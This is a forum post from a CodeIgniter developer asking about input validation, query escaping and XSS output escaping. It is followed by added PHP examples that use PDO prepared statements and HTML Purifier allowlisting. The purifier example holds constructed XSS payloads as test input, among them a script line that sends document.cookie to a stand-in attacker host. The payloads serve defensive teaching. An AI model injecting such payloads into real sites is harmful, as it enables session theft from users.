Are you sure about handling SECURITY?!

Hi to all developers...

NOTICE! Dear developer... If you're tired or don't have enough time to read this, please skip it for now and come back later! We will try to make this post a good and complete reference about this repeatedly raised but never completely answered issue... input and output security.

I know there were some posts about this issue and I have read almost all of them. But I think there are still some misunderstandings about the security issue and how to handle it.

Suppose I prepare a form for collecting info about users, like their name, job, state, username, password, etc. Let's consider one:

PHP Code:
<?php echo form_open('user/complete_info'); ?>

   <input type="text" name="first_name" value="<?= set_value('first_name'); ?>" placeholder="enter your first name"/>
   <!-- other inputs -->

   <button type="submit" name="complete_info">Send</button>
<?php echo form_close(); ?>

Now the user inserts something in this input and, let's assume, submits it. Now in the controller:
    1. I filter or validate the input (as @mwhitney frequently mentioned: filter (validate) input, escape output).
PHP Code:

As you see, I validate the input via regex and allow just a-z and A-Z chars. (Also, for now, the user can insert [ and ] and I could not handle this issue!)

    2. If the input is valid, I will store it in the database.

PHP Code:
if($this->form_validation->run() === FALSE){
   //some codes and return to form

} else{
   $info = array(
     'first_name'     => $this->input->post('first_name'),
     //other inputs
   );
   $db_result = $this->User_model->insert_user_info($info);
   //some codes
}

PHP Code:
public function insert_user_info($info){
   $this->db->insert('user_info', $info); // table name is an assumption
   return $this->db->affected_rows() > 0;
}

In existing posts and their replies, some developers said:
  • Use PHP's built-in filter / data type functions
  • Escape via html_escape() or htmlspecialchars()
  • HTML Purifier classes
  • Escape queries before inserting into the database
  • ...
Q1. Now that I filter inputs via regex, for strings, for numbers, etc., and accept just the defined chars, e.g. alphabets for name, numbers for zip code, alphabets and numbers for username and more, should I use the first 3 mentioned options for filtering and encoding inputs?

Q2. Now that I use the CI 3 Query Builder, should I escape my queries?

After I handle these, the user can see the completed info in his/her panel. Now first, I must retrieve and read the info from the database; the info is input (as @mwhitney mentioned here) and the output is the HTML code that is sent to the user's browser, the user panel.

Q3. How could I handle this properly? Just retrieve them, put them through the xss_clean() function and pass the result to the view file? Or use htmlspecialchars()? Or some other approach?
Q4. As @mwhitney said, now the input is the info read from the db, so how could I validate them as inputs?

Suppose I prepare a simple WYSIWYG editor for users and accept some basic tags; in this situation what should I do? As you know, some of these editors (like CKEditor) encode some chars, but I know I must validate them on the server side.

Q5. How do I do this? Just use htmlspecialchars() or xss_clean(), or is it better to use the HTML Purifier classes? Or some other actions?

I, as an admin, prepare some posts with a world of tags! and store them in the database in order to allow some users to read them. What about this situation?
Some developers talked about filtering and validating http_request, URLs that redirect to them, or other foreign input. Is it possible to discuss these and give practical examples?
* As I said, I use the latest version of CI.
* I have enabled CSRF too.
* I know about OWASP and have looked at it quickly, and will read more.
Thanks to all experts who have arrived at this line :) and want to share info. If you could, please explain more and in detail, so that other issues can be referred to this post in the future.
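The "validate input, parameterise the query, escape output" pipeline that Q1 to Q4 ask about, as an added example that is not part of the original post and not CodeIgniter code. It is written against plain PDO with the sqlite driver so it runs stand-alone; the function names, the `user_info` table and the sample inputs are constructed for the illustration. The CI 3 Query Builder (`$this->db->insert()`, `where()` and friends) escapes values itself, which is the same property the prepared statement below gives you; manual escaping is only needed when you build SQL strings by hand, and even then `$this->db->query($sql, $binds)` with `?` placeholders is the better tool.

```php
<?php
// Added example (not from the original post or CodeIgniter): the
// validate -> store -> escape-on-output pipeline, framework-free so it
// runs stand-alone with PDO + sqlite. Names and sample data are assumptions.
declare(strict_types=1);

// 1. Validation is an allowlist regex. The anchors (^ ... $) and the D
//    modifier matter: without them "[abc" or "abc\n" still "match", which is
//    one way stray [ and ] slip past a name check.
function validate_first_name(string $name): bool
{
    return (bool) preg_match('/^[A-Za-z]{1,50}$/D', $name);
}

function validate_zip(string $zip): bool
{
    return (bool) preg_match('/^[0-9]{5}$/D', $zip);
}

// 2. Storage uses a prepared statement with bound parameters. The value
//    never becomes part of the SQL text, so there is nothing to escape.
function insert_user_info(PDO $db, array $info): bool
{
    $stmt = $db->prepare('INSERT INTO user_info (first_name, zip) VALUES (:first_name, :zip)');
    $stmt->bindValue(':first_name', $info['first_name'], PDO::PARAM_STR);
    $stmt->bindValue(':zip', $info['zip'], PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->rowCount() > 0;
}

// 3. Output escaping happens at render time, for the HTML context being
//    written into. What was validated on the way in does not change this:
//    the database is just another input, and xss_clean() is not an encoder.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_panel(array $row): string
{
    return '<p>Name: ' . e($row['first_name']) . ', zip ' . e($row['zip']) . '</p>' . "\n"
         . '<input type="text" name="first_name" value="' . e($row['first_name']) . '">';
}

// --- demo with constructed input ---
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE user_info (id INTEGER PRIMARY KEY, first_name TEXT, zip TEXT)');

$samples = [
    ['first_name' => 'Sajjad',             'zip' => '12345'],
    ['first_name' => 'Sa[jj]ad',           'zip' => '12345'], // brackets: rejected by the anchored class
    ['first_name' => "Sajjad\n",           'zip' => '12345'], // trailing newline: rejected because of /D
    ['first_name' => "O'Brien",            'zip' => '12345'], // a real name this allowlist also rejects
    ['first_name' => '<script>x</script>', 'zip' => '1234a'],
];

foreach ($samples as $info) {
    if (!validate_first_name($info['first_name']) || !validate_zip($info['zip'])) {
        echo 'rejected: ' . json_encode($info) . "\n";
        continue;
    }
    insert_user_info($db, $info);
}

// A row written by some other path (an admin tool, an import) with weaker
// checks is still rendered safely, because escaping is done on output.
$db->exec("INSERT INTO user_info (first_name, zip) VALUES ('<b onmouseover=alert(1)>x</b>', '00000')");

foreach ($db->query('SELECT first_name, zip FROM user_info') as $row) {
    echo render_panel($row), "\n";
}
```

Two caveats worth keeping in mind when copying this shape into a CI controller: the strict `[A-Za-z]` class is what rejects the brackets, but it also rejects `O'Brien` and every non-Latin name, so if you relax it the output escaping is what keeps the panel safe, not the regex; and `htmlspecialchars()` (or CI's `html_escape()`, which wraps it) is only correct for HTML text and attribute values. A value placed inside a `<script>` block, a URL or a CSS rule needs the encoder for that context instead.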
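For Q5 and the admin-authored rich text, where some tags must survive, escaping is the wrong tool and a blocklist filter such as xss_clean() is not a guarantee. The example below is an added one, not code from the original post, CodeIgniter or CKEditor: it allowlists markup server-side with HTML Purifier (installed via `composer require ezyang/htmlpurifier`). The allowed-tag list, the function names and the sample input are assumptions chosen for the illustration.

```php
<?php
// Added example (not from the original post, CodeIgniter or CKEditor):
// server-side allowlisting of WYSIWYG output with HTML Purifier.
// Requires: composer require ezyang/htmlpurifier
// The tag list, function names and sample input are assumptions.
declare(strict_types=1);

require __DIR__ . '/vendor/autoload.php';

function make_purifier(): HTMLPurifier
{
    $config = HTMLPurifier_Config::createDefault();
    // Allowlist, not blocklist: any element or attribute not named is dropped,
    // including every on* handler, <script>, <iframe> and <img>.
    $config->set('HTML.Allowed', 'p,br,b,strong,i,em,ul,ol,li,a[href],blockquote');
    // Only plain web links; javascript: and data: URIs are stripped.
    $config->set('URI.AllowedSchemes', ['http' => true, 'https' => true]);
    $config->set('HTML.Nofollow', true);
    // The library's default cache directory is often not writable by the web user.
    $config->set('Cache.SerializerPath', sys_get_temp_dir());
    return new HTMLPurifier($config);
}

// Call this at submit time, before the value reaches the model, and store the
// result. Render it later with a plain echo, not htmlspecialchars(), because
// the allowlist has already decided which markup is trusted.
function clean_rich_text(HTMLPurifier $purifier, string $dirty): string
{
    return $purifier->purify($dirty);
}

// Constructed sample of what a browser-side editor cannot be relied on to stop,
// since the attacker can bypass the editor and POST directly:
$dirty = <<<'HTML'
<p onmouseover="alert(1)">Hello <b>world</b></p>
<script>document.location='http://evil.example/?c='+document.cookie</script>
<a href="javascript:alert(2)">click</a>
<a href="https://example.org/">ok</a>
<img src=x onerror="alert(3)">
<iframe src="https://evil.example/"></iframe>
HTML;

$purifier = make_purifier();
echo clean_rich_text($purifier, $dirty), "\n";
```

The same function serves the admin case: an administrator's account can be phished or hijacked, so treating admin-authored HTML as trusted only moves the XSS one step away. If you genuinely need tags the allowlist does not cover (tables, images from your own host), add them to `HTML.Allowed` explicitly rather than widening the list to "everything except scripts".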

Are you sure about handling SECURITY?! - by pb.sajjad - 07-15-2016, 06:52 AM